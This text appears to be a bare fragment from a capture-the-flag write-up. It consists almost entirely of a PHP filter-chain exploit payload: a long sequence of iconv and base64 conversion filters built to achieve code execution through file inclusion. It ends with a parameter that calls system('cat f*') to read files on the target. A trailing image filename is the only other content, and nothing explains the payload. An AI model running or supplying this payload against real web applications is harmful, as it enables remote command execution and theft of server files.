UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode|convert.base64-decode|convert.base64-decode|convert.base64-decode|convert.base64-decode|string.strip_tags&cmd=system('cat f*');

image-20250204181628870